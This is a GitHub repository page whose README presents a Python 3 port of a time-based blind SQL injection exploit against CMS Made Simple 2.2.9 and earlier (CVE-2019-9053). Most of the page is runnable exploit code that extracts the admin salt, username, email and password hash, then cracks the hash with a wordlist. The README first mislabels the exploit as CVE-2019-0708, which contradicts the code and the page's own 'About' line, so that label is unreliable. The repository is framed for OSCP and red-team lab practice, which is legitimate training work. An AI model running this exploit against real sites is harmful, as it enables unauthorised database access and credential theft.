Skip to content

Hackheart-tech/-exploit-lab

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

-exploit-lab

Exploits Python cve-2019-0708 – by HackHeart 🧠 Code Review & Porting - Python 2 → Python 3 This exploit was originally written in Python 2, which is no longer supported by modern systems. To ensure compatibility and maintain future-proof tooling, the entire codebase has been carefully reviewed and migrated to Python 3.

🔧 Key improvements during the port:

Updated print statements to Python 3 syntax

Replaced raw_input() with input()

Adapted socket operations to handle byte/str properly (.decode() added)

Removed deprecated methods like xrange() and .iteritems()

Validated script compatibility with Python 3.8+ and modern Linux distros

🛡️ This version maintains the exploit logic intact while ensuring:

Compatibility with modern OSCP / Red Team labs

Cleaner, safer, and more readable syntax

Ready-to-run in modern environments (VS Code, Kali, Parrot OS…)

#!/usr/bin/env python3

CVE-2019-9053 - CMS Made Simple <= 2.2.9 - Unauthenticated SQL Injection

import requests import time import argparse import hashlib

parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', required=True, help="Base target URI (e.g. http://10.10.10.100/cms)") parser.add_argument('-w', '--wordlist', help="Wordlist for cracking admin password") parser.add_argument('-c', '--crack', action='store_true', help="Crack password with wordlist")

args = parser.parse_args()

url_vuln = args.url.rstrip('/') + '/moduleinterface.php?mact=News,m1_,default,0' session = requests.Session() dictionary = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@._-$' TIME = 1

flag = True salt = '' username = '' email = '' password_hash = '' output = ""

def dump_field(field_name, table, column, condition): global flag result = "" ord_result = "" while flag: flag = False for char in dictionary: temp_result = result + char ord_temp_result = ord_result + format(ord(char), "x") print(f"[*] Trying {temp_result}") payload = f"a,b,1,5))+AND+(SELECT+SLEEP({TIME})+FROM+{table}+WHERE+{column}+LIKE+0x{ord_temp_result}25+AND+{condition})--+" start_time = time.time() session.get(url_vuln + "&m1_idlist=" + payload) if time.time() - start_time >= TIME: result = temp_result ord_result = ord_temp_result flag = True break return result

print("[+] Extracting salt...") flag = True salt = dump_field("salt", "cms_siteprefs", "sitepref_value", "sitepref_name+LIKE+0x736974656d61736b") output += f"Salt: {salt}\n"

print("[+] Extracting username...") flag = True username = dump_field("username", "cms_users", "username", "user_id+LIKE+0x31") output += f"Username: {username}\n"

print("[+] Extracting email...") flag = True email = dump_field("email", "cms_users", "email", "user_id+LIKE+0x31") output += f"Email: {email}\n"

print("[+] Extracting password hash...") flag = True password_hash = dump_field("password", "cms_users", "password", "user_id+LIKE+0x31") output += f"Hash: {password_hash}\n"

if args.crack and args.wordlist: print("[+] Cracking password...") with open(args.wordlist, 'r', encoding='utf-8', errors='ignore') as f: for line in f: word = line.strip() print(f"[*] Trying password: {word}") if hashlib.md5((salt + word).encode()).hexdigest() == password_hash: output += f"[+] Password cracked: {word}\n" break

print("\n=== Exploit Results ===") print(output)

About

Exploits Python cve-2019-9053– by HackHeart

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages